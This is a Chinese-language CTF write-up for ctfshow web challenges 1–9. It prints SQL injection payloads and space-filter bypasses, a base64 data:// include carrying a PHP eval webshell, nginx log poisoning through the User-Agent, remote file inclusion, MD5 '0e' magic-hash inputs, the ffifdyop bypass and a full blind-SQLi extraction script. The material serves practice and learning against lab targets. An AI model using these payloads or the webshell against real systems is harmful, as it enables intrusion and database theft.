ctfshow刷题
240
2023-08-06
ctfshow
web1-签到
直接查看网页源码,看见base64编码,解码后得到flag
web2-最简单的SQL注入
看见输入框直接尝试万能密码
username=admin' or 1 = 1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
username=admin' or 1 = 1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'
username=admin' or 1 = 1 union select 1,group_concat(flag),3 from flag#&password=123
web3-文件包含1
<?php include($_GET['url']);?>
使用data://
?url=data://text/plain;base64,PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==
// <?php eval($_POST[1]); ?>
传入一句话木马,使用蚁剑连,拿到flag
web4-文件包含2
页面和上一题一样,但是使用data和filter都报错,但是可以读取文件
读取nginx日志
?url=/var/log/nginx/access.log
发现有UA,可以在UA中写入一句话木马,使用蚁剑连,拿到flag
还存在远程包含漏洞,在自己的服务器上写入一句话木马,使用蚁剑连,拿到flag
web5-弱比较
<?php
$flag="";
$v1=$_GET['v1'];
$v2=$_GET['v2'];
if(isset($v1) && isset($v2)){
if(!ctype_alpha($v1)){
die("v1 error");
}
if(!is_numeric($v2)){
die("v2 error");
}
if(md5($v1)==md5($v2)){
echo $flag;
}
}else{
echo "where is flag?";
}
?>
使用0e绕过
QNKCDZO 0e830400451993494058024219903391
240610708 0e462097431906509019562988736854
s878926199a 0e545993274517709034328855841020
s155964671a 0e342768416822451524974117254469
s214587387a 0e848240448830537924465865611904
s214587387a 0e848240448830537924465865611904
s878926199a 0e545993274517709034328855841020
s1091221200a 0e940624217856561557816327384675
s1885207154a 0e509367213418206700842008763514
s1502113478a 0e861580163291561247404381396064
s1885207154a 0e509367213418206700842008763514
s1836677006a 0e481036490867661113260034900752
s155964671a 0e342768416822451524974117254469
s1184209335a 0e072485820392773389523109082030
s1665632922a 0e731198061491163073197128363787
s1502113478a 0e861580163291561247404381396064
s1836677006a 0e481036490867661113260034900752
s1091221200a 0e940624217856561557816327384675
s155964671a 0e342768416822451524974117254469
s1502113478a 0e861580163291561247404381396064
s155964671a 0e342768416822451524974117254469
s1665632922a 0e731198061491163073197128363787
s155964671a 0e342768416822451524974117254469
s1091221200a 0e940624217856561557816327384675
s1836677006a 0e481036490867661113260034900752
s1885207154a 0e509367213418206700842008763514
s532378020a 0e220463095855511507588041205815
s878926199a 0e545993274517709034328855841020
s1091221200a 0e940624217856561557816327384675
s214587387a 0e848240448830537924465865611904
s1502113478a 0e861580163291561247404381396064
s1091221200a 0e940624217856561557816327384675
s1665632922a 0e731198061491163073197128363787
s1885207154a 0e509367213418206700842008763514
s1836677006a 0e481036490867661113260034900752
s1665632922a 0e731198061491163073197128363787
s878926199a 0e545993274517709034328855841020
payload
?v1=QNKCDZO&v2=240610708
web6-sql注入过滤了空格
和前面那题一样,然后页面提示 sql inject error
原来是过滤了空格,使用/**/绕过
username=1'/**/or/**/1/**/=/**/1#&password=1
username=1'/**/or/**/1/**/=/**/1/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()#&password=1
username=1'/**/or/**/1/**/=/**/1/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name='flag'#&password=1
username=1'/**/or/**/1/**/=/**/1/**/union/**/select/**/1,flag,3/**/from/**/flag#&password=1
还可以使用 %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 绕过
web7-sql注入过滤了空格和单引号
?id=1/**/union/**/select/**/1,2,3#
?id=1/**/union/**/select/**/1,database(),3#
?id=1/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()#
?id=1/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name="flag"#
?id=1/**/union/**/select/**/1,flag,3/**/from/**/flag#
web8-盲注
过滤了空格、逗号和单引号
- 我的垃圾脚本
import requests
url="http://3348c179-5956-47f2-9636-5d8b98359fbf.challenge.ctf.show/index.php?id=-1/**/or/**/"
headers = {'Connection': 'close'}
def db_name():
db_list=[]
payload = "ascii(substr(database()/**/from/**/{}/**/for/**/1))={}"
payload1="ascii(substr(database()/**/from/**/{}/**/for/**/1))=0"
for i in range(1,65): # 数据库名称最大长度为64
for j in range(32,126): # ascii码中32-126为可见字符
req=requests.get(url+payload.format(i,j),headers=headers)
req1=requests.get(url+payload1.format(i),headers=headers)
if "If" in req.text:
db_list.append(chr(j))
continue
if "If" in req1.text:
break
return ''.join(db_list)
def tb_name():
table_list=[]
#判断数据库中有几张表
payload1="(SELECT/**/count(table_name)/**/FROM/**/information_schema.tables/**/WHERE/**/table_schema=database())={}"
for i in range(1,20):
req=requests.get(url+payload1.format(i),headers=headers)
if "If" in req.text:
table_num=i
break
print("数据库中有{}张表".format(table_num))
for i in range(table_num):
tname=""
print("第{}张表".format(i+1))
for j in range(1,50): #表名最大长度为50
for k in range(32, 126): # ascii码中32-126为可见字符
payload2="(ascii(substr((SELECT/**/table_name/**/FROM/**/information_schema.tables/**/WHERE/**/table_schema=database()/**/limit/**/1/**/offset/**/{})/**/from/**/{}/**/for/**/1)))={}"
req=requests.get(url+payload2.format(i,j,k),headers=headers)
payload3="(ascii(substr((SELECT/**/table_name/**/FROM/**/information_schema.tables/**/WHERE/**/table_schema=database()/**/limit/**/1/**/offset/**/{})/**/from/**/{}/**/for/**/1)))=0"
req1=requests.get(url+payload3.format(i,j),headers=headers)
if "If" in req.text:
tname+=chr(k)
continue
if "If" in req1.text:
break
table_list.append(tname)
return table_list
def col_name(tb_name):
col_list=[]
for i in tb_name:
print("表名为:{}".format(i))
col_num=0
for j in range(1,20):
payload1="(SELECT/**/count(column_name)/**/FROM/**/information_schema.columns/**/WHERE/**/table_name=\"{}\")={}"
req=requests.get(url+payload1.format(i,j),headers=headers)
if "If" in req.text:
col_num=j
break
print("表{}中有{}列".format(i,col_num))
for j in range(col_num):
cname=""
print("第{}列".format(j+1))
for k in range(1,50):
for l in range(32, 126):
payload2="(ascii(substr((SELECT/**/column_name/**/FROM/**/information_schema.columns/**/WHERE/**/table_name=\"{}\"/**/limit/**/1/**/offset/**/{})/**/from/**/{}/**/for/**/1)))={}"
req=requests.get(url+payload2.format(i,j,k,l),headers=headers)
payload3="(ascii(substr((SELECT/**/column_name/**/FROM/**/information_schema.columns/**/WHERE/**/table_name=\"{}\"/**/limit/**/1/**/offset/**/{})/**/from/**/{}/**/for/**/1)))=0"
req1=requests.get(url+payload3.format(i,j,k),headers=headers)
if "If" in req.text:
cname+=chr(l)
continue
if "If" in req1.text:
break
col_list.append(cname)
return col_list
def col_data(tb_name,col_name):
data_list=[]
for i in tb_name:
print("表名为:{}".format(i))
for j in col_name:
print("列名为:{}".format(j))
data_num=0
for k in range(1,20):
payload1="(SELECT/**/count({})/**/FROM/**/{}/**/WHERE/**/1={})={}"
req=requests.get(url+payload1.format(j,i,k,k),headers=headers)
if "If" in req.text:
data_num=k
break
print("表{}中列{}有{}条数据".format(i,j,data_num))
for k in range(data_num):
dname=""
print("第{}条数据".format(k+1))
for l in range(1,50):
for m in range(32, 126):
payload2="(ascii(substr((SELECT/**/{}/**/FROM/**/{}/**/limit/**/1/**/offset/**/{})/**/from/**/{}/**/for/**/1)))={}"
req=requests.get(url+payload2.format(j,i,k,l,m),headers=headers)
payload3="(ascii(substr((SELECT/**/{}/**/FROM/**/{}/**/limit/**/1/**/offset/**/{})/**/from/**/{}/**/for/**/1)))=0"
req1=requests.get(url+payload3.format(j,i,k,l,m),headers=headers)
if "If" in req.text:
# print(chr(m))
dname+=chr(m)
continue
if "If" in req1.text:
break
data_list.append(dname)
return data_list
# print("数据库名称为:{}".format(db_name()))
print("数据库中的数据为:{}".format(col_data(tb_name(),col_name(tb_name()))))
# print("数据库名称为:{}".format(db_name()))
# # print("数据库中的表为:{}".format(tb_name()))
# print("数据库中的列为:{}".format(col_name(tb_name())))
web9-md5
使用dirsearch扫到/robots.txt,访问/robots.txt,发现/index.phps,访问/index.phps,发现源码
<?php
$flag="";
$password=$_POST['password'];
if(strlen($password)>10){
die("password error");
}
$sql="select * from user where username ='admin' and password ='".md5($password,true)."'";
$result=mysqli_query($con,$sql);
if(mysqli_num_rows($result)>0){
while($row=mysqli_fetch_assoc($result)){
echo "登陆成功<br>";
echo $flag;
}
}
?>
payload\
ffifdyop
原理是
md5('ffifdyop',true)=’or’6xxxxxx
- 0
- 0
-
分享